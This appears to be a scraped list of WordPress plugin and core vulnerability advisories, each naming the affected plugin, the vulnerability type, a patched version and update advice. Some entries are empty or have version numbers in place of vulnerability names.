Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: Corner Ad

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.57
Recommended Action: Update to version 1.0.57, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.16
Recommended Action: Update to version 3.2.16, or a newer patched version

Plugin: Store Toolkit – WooCommerce Extensions, Quick Enhancements & Handy Tools

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Access Code Feeder

Plugin: AI Engine

Vulnerability: Authenticated(Editor+) Arbitrary File Upload via add_image_from_url
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: SQL Injection
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Activation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: CF7 Invisible reCAPTCHA

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Mega Menu Plugin for WordPress – AP Mega Menu

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: a3 Responsive Slider

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: wp-media-player

Plugin: Spot.IM Comments

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: WP JS

Plugin: Admin and Site Enhancements (ASE)

Vulnerability: Password Protection Mode Security Feature Bypass
Patched Version: 5.8.0
Recommended Action: Update to version 5.8.0, or a newer patched version

Plugin: Post Gallery

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.31
Recommended Action: Update to version 1.1.31, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Advanced Product Labels for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.3.7
Recommended Action: Update to version 1.2.3.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authorization Bypass to Arbitrary File Upload/Delete
Patched Version: 1.0.84
Recommended Action: Update to version 1.0.84, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Cross-Site Request Forgery via delete
Patched Version: 6.2.0.0
Recommended Action: Update to version 6.2.0.0, or a newer patched version

Plugin: EmbedSocial – Social Media Feeds, Reviews and Galleries

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.1.28
Recommended Action: Update to version 1.1.28, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: article2pdf

Vulnerability: 0.27
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thinkun Remind

Vulnerability: Directory Traversal
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Sharebar

Vulnerability: Cross-Site Request Forgery to Settings Update & Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ibtana – WordPress Website Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2.1
Recommended Action: Update to version 1.2.2.1, or a newer patched version

Plugin: Code Snippets

Vulnerability: Cross-Site Request Forgery to Remote Code Execution
Patched Version: 2.14.0
Recommended Action: Update to version 2.14.0, or a newer patched version

Plugin: Magn WP Drag And Drop Media Uploader

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Structured Content (JSON-LD) #wpsc

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Quiz Maker

Vulnerability: SQL Injection
Patched Version: 6.2.0.9
Recommended Action: Update to version 6.2.0.9, or a newer patched version

Plugin: Advanced Local Pickup for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Super Popup

Plugin: Continuous Image Carousel With Lightbox

Vulnerability: Reflected Cross-Site Scripting via search_term, order_by and order_pos
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: jQuery T(-) Countdown Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortocde
Patched Version: 2.3.24
Recommended Action: Update to version 2.3.24, or a newer patched version

Plugin: Image Optimizer by 10web – Image Optimizer and Compression plugin

Vulnerability: Directory Traversal to Information Exposure
Patched Version: 1.0.26
Recommended Action: Update to version 1.0.26, or a newer patched version

Plugin: Xerte Online

Vulnerability: Arbitrary File Upload
Patched Version: 0.36
Recommended Action: Update to version 0.36, or a newer patched version

Plugin: WP Zoho for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms – CRM, Bigin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.24
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.24, 3.8.24, 3.9.22, 4.0.21, 4.1.21, 4.2.18, 4.3.14, 4.4.13, 4.5.12, 4.6.9, 4.7.8, 4.8.4, 4.9.1

Plugin: File Gallery

Vulnerability: Reflected Cross-Site Scripting via post_id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Secure Copy Content Protection and Content Locking

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.8.2
Recommended Action: Update to version 2.8.2, or a newer patched version

Plugin: Blue Wrench Video Widget

Vulnerability: Cross-Site Request Forgery and to Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: GD Mail Queue

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Quick Page/Post Redirect Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Geo Mashup

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Up down image slideshow gallery

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 12.1
Recommended Action: Update to version 12.1, or a newer patched version

Plugin: BSK PDF Manager

Vulnerability: Authenticated SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: WPGateway

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting
Patched Version: 4.3.25
Recommended Action: Update to version 4.3.25, or a newer patched version

Plugin: Guest Author

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Add Shortcodes Actions And Filters

Plugin: LiveChat – WP live chat plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.5.16
Recommended Action: Update to version 4.5.16, or a newer patched version

Plugin: Easy Modal

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Cross-Site Scripting
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.5
Recommended Action: Update to version 8.5, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Ban Bypass
Patched Version: 2.26.5
Recommended Action: Update to version 2.26.5, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Multiple Cross-Site Request Forgery vulnerabilities
Patched Version: 3.9.9
Recommended Action: Update to version 3.9.9, or a newer patched version

Plugin: flickrRSS

Vulnerability: Cross-Site Scripting via flickrRSS_id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Eventify™ – Simple Events

Plugin: ajax-random-post

Plugin: Title Field Validation

Plugin: Shortcodes by Angie Makes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.1.28
Recommended Action: Update to version 2.1.28, or a newer patched version

Plugin: WP Clone Menu

Vulnerability: Missing Authorization to Menu Clone
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GNUCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Popup Maker and Popup Anything – Popup for opt-ins and Lead Generation Conversions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: 5 Anker Connect

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: TK Google Fonts GDPR Compliant

Vulnerability: Missing Authorization to Font Deletion
Patched Version: 2.2.12
Recommended Action: Update to version 2.2.12, or a newer patched version

Plugin: Ajax Pagination and Infinite Scroll

Plugin: YITH WooCommerce Waitlist

Vulnerability: Cross-Site Request forgery via ‘save_mail_status’
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘redirectionPageContent’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: tencentcloud-cos

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_move_object
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Product Code for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via get
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Custom Header Images

Plugin: Broken Link Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.5.0
Recommended Action: Update to version 0.5.0, or a newer patched version

Plugin: lastfm-rotation

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Call Now Button – The #1 Click to Call Button for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Support Board

Vulnerability: Authenticated SQL Injection
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.3.24
Recommended Action: Update to version 4.3.24, or a newer patched version

Plugin: Predictive Search for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: sourceAFRICA

Plugin: Event Timeline – Vertical Timeline

Plugin: Popup by Supsystic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.10.5
Recommended Action: Update to version 1.10.5, or a newer patched version

Plugin: WP Register Profile With Shortcode

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Unite Gallery Lite

Vulnerability: Authenticated(Administrator+) Local File Inclusion via ‘view’ parameter
Patched Version: 1.7.60
Recommended Action: Update to version 1.7.60, or a newer patched version

Plugin: Wise Agent Lead Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: CYSTEME Finder, the admin files explorer

Vulnerability: Arbitrary File Upload/Read
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Featured Image Caption

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.8.11
Recommended Action: Update to version 0.8.11, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: Tables & Table Charts <= 2.1.65
Patched Version: 2.1.66
Recommended Action: Update to version 2.1.66, or a newer patched version

Plugin: Events Manager Pro

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Freesoul Deactivate Plugins – Disable plugins on individual WordPress pages

Vulnerability: Information Disclosure
Patched Version: 1.9.4.1
Recommended Action: Update to version 1.9.4.1, or a newer patched version

Plugin: WP Construction Mode

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.92
Recommended Action: Update to version 1.92, or a newer patched version

Plugin: Google Forms

Vulnerability: Unauthenticated Server Side Request Forgery
Patched Version: 0.92
Recommended Action: Update to version 0.92, or a newer patched version

Plugin: WooCommerce

Vulnerability: Settings Bypass leading to Account Creation
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: WP VK-付费内容插件（付费阅读/资料/工具软件资源管理）

Vulnerability: Cross-Site Request Forgery via AJAX actions
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: WP-RecentComments

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Custom Menu Plugin

Plugin: Data Tables Generator by Supsystic

Vulnerability: Cross-Site Scripting
Patched Version: 1.10.20
Recommended Action: Update to version 1.10.20, or a newer patched version

Plugin: BigBlueButton

Plugin: dsSearchAgent: WordPress Edition

Plugin: User Rights Access Manager

Vulnerability: Missing Authorization
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Float to Top Button

Plugin: Amministrazione Aperta

Vulnerability: Admin+ Local File Inclusion
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Accordion Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Cross-Site Request Forgery via Multiple Functions
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Authenticated (Editor+) Privilege Escalation
Patched Version: 8.7
Recommended Action: Update to version 8.7, or a newer patched version

Plugin: SpiderVPlayer

Vulnerability: Multiple Blind Authenticated SQL Injections
Patched Version: 1.5.18
Recommended Action: Update to version 1.5.18, or a newer patched version

Plugin: rtMedia for WordPress, BuddyPress and bbPress

Vulnerability: Missing Authorization via export_settings
Patched Version: 4.6.15
Recommended Action: Update to version 4.6.15, or a newer patched version

Plugin: Organization chart

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Missing Authorization
Patched Version: 3.13.1
Recommended Action: Update to version 3.13.1, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Promotion Slider

Plugin: Yoast SEO

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Resize Image After Upload

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: True Ranker

Vulnerability: Directory Traversal/Arbitrary File Read
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in ajaxCalculatePrice function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Recent Posts Slider

Plugin: Social Share Button

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Translate Multilingual sites – TranslatePress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: MainWP Buddy Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Missing Authorization
Patched Version: 5.2.3.1
Recommended Action: Update to version 5.2.3.1, or a newer patched version

Plugin: Post Snippets – Custom WordPress Code Snippets Customizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘snippet_content’
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Custom Permalinks

Vulnerability: No subtitle
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Advanced Booking Calendar

Vulnerability: Reflected Cross-Site Scripting via calId Parameter
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Online Lesson Booking

Vulnerability: Cross-Site Scripting
Patched Version: 0.8.7
Recommended Action: Update to version 0.8.7, or a newer patched version

Plugin: trust-form

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.9.0
Recommended Action: Update to version 3.9.0, or a newer patched version

Plugin: WordPress Brute Force Protection – Stop Brute Force Attacks

Vulnerability: Authenticated (Administrator+) SQL Injection via orderby
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: WP BrowserUpdate

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Simpel Reserveren 3

Plugin: 404 to Start

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Arbitrary File Read
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Code Injection
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: WP CleanFix

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.45
Recommended Action: Update to version 1.1.45, or a newer patched version

Plugin: Reusable Text Blocks

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Registration Forms

Plugin: Adminimize

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.22
Recommended Action: Update to version 1.7.22, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Arbitrary File Upload
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: Compact WP Audio Player

Vulnerability: Setting Change via Cross-Site Request Forgery
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.64.1
Recommended Action: Update to version 3.64.1, or a newer patched version

Plugin: Name Directory

Vulnerability: Cross-Site Scripting
Patched Version: 1.25.3
Recommended Action: Update to version 1.25.3, or a newer patched version

Plugin: FormCraft

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.5.16
Recommended Action: Update to version 1.5.16, or a newer patched version

Plugin: Stylish Price List – Price Table Builder & QR Code Restaurant Menu

Vulnerability: Missing Authorization
Patched Version: 7.0.18
Recommended Action: Update to version 7.0.18, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.38
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.38, 4.2.35, 4.3.31, 4.4.30, 4.5.29, 4.6.26, 4.7.26, 4.8.22, 4.9.23, 5.0.19, 5.1.16, 5.2.18, 5.3.15, 5.4.13, 5.5.12, 5.6.11, 5.7.9, 5.8.7, 5.9.6, 6.0.4, 6.1.2, 6.2.1

Plugin: Social Ring (Facebook Like, Google +1, ReTweet, LinkedIn and Pin It)

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.3.7
Recommended Action: Update to version 4.3.7, or a newer patched version

Plugin: Import CSV Files

Plugin: Video Player for YouTube

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Minimal Coming Soon – Coming Soon Page

Vulnerability: Missing Authorization to Export Settings/Theme Change
Patched Version: 2.17
Recommended Action: Update to version 2.17, or a newer patched version

Plugin: WP Simple Galleries

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Hierarchy (parent) to post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: EXMAGE – WordPress Image Links

Vulnerability: Admin+ Blind SSRF
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: URL Cloak & Encrypt

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Google Maps Anywhere

Core: WordPress

Vulnerability: 5.9.1
Patched Version: 5.9.2
Recommended Action: Update to version 5.9.2, or a newer patched version

Plugin: Accessibility

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Exxp

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.174.1
Recommended Action: Update to version 5.174.1, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.7.2
Recommended Action: Update to version 1.2.7.2, or a newer patched version

Plugin: Porto Theme – Functionality

Vulnerability: Functionality <= 2.11.1
Patched Version: 2.12.1
Recommended Action: Update to version 2.12.1, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 4.23.3
Recommended Action: Update to version 4.23.3, or a newer patched version

Plugin: Like Button Rating ♥ LikeBtn

Vulnerability: Server-Side Request Forgery
Patched Version: 2.6.32
Recommended Action: Update to version 2.6.32, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Authenticated Stored Cross Site Scripting
Patched Version: 5.22.3
Recommended Action: Update to version 5.22.3, or a newer patched version

Plugin: WordPress支付宝Alipay|财付通Tenpay|贝宝PayPal集成插件

Plugin: BSK Contact Form 7 Blacklist

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated SQL Injection
Patched Version: 1.3.38
Recommended Action: Update to version 1.3.38, or a newer patched version

Plugin: Ultimate Category Excluder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Total Upkeep – WordPress Backup Plugin plus Restore & Migrate by BoldGrid

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Information Disclosure
Patched Version: 1.14.14
Recommended Action: Update to version 1.14.14, or a newer patched version

Plugin: Skippy WP-DB Backup (Legacy Core Plugin)

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPComplete

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7.6
Recommended Action: Update to version 2.7.6, or a newer patched version

Plugin: MWB Point of Sale (POS) for WooCommerce- Generate Barcodes, Process your Bills, Synchronize, Your Online-Offline Orders

Vulnerability: Missing Authorization
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: 10.38
Recommended Action: Update to version 10.38, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: Courses for Membership Add On <= 1.2.3
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Unauthenticated Sensitive Information Exposure via Debug Log File
Patched Version: 2.33.4
Recommended Action: Update to version 2.33.4, or a newer patched version

Plugin: Ultimate TinyMCE

Vulnerability: Cross-Site Scripting
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Bulk NoIndex & NoFollow Toolkit

Vulnerability: Reflected Cross-Site Scripting via ‘s’
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Custom Field Suite

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.5.15
Recommended Action: Update to version 2.5.15, or a newer patched version

Plugin: WP Spell Check

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 9.13
Recommended Action: Update to version 9.13, or a newer patched version

Plugin: DSubscribers

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP Events Calendar Plugin

Vulnerability: SQL Injection
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Image Hover Effects Css3

Plugin: Contact Form – Custom Builder, Payment Form, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Points and Rewards for WooCommerce – Create Loyalty Programs, Reward Customer Purchases, Point Rewards, Referral Points, Reward for Points, User Badges, and Gamification

Vulnerability: Missing Authorization
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: cforms

Vulnerability: Cross-Site Scripting
Patched Version: 10.5
Recommended Action: Update to version 10.5, or a newer patched version

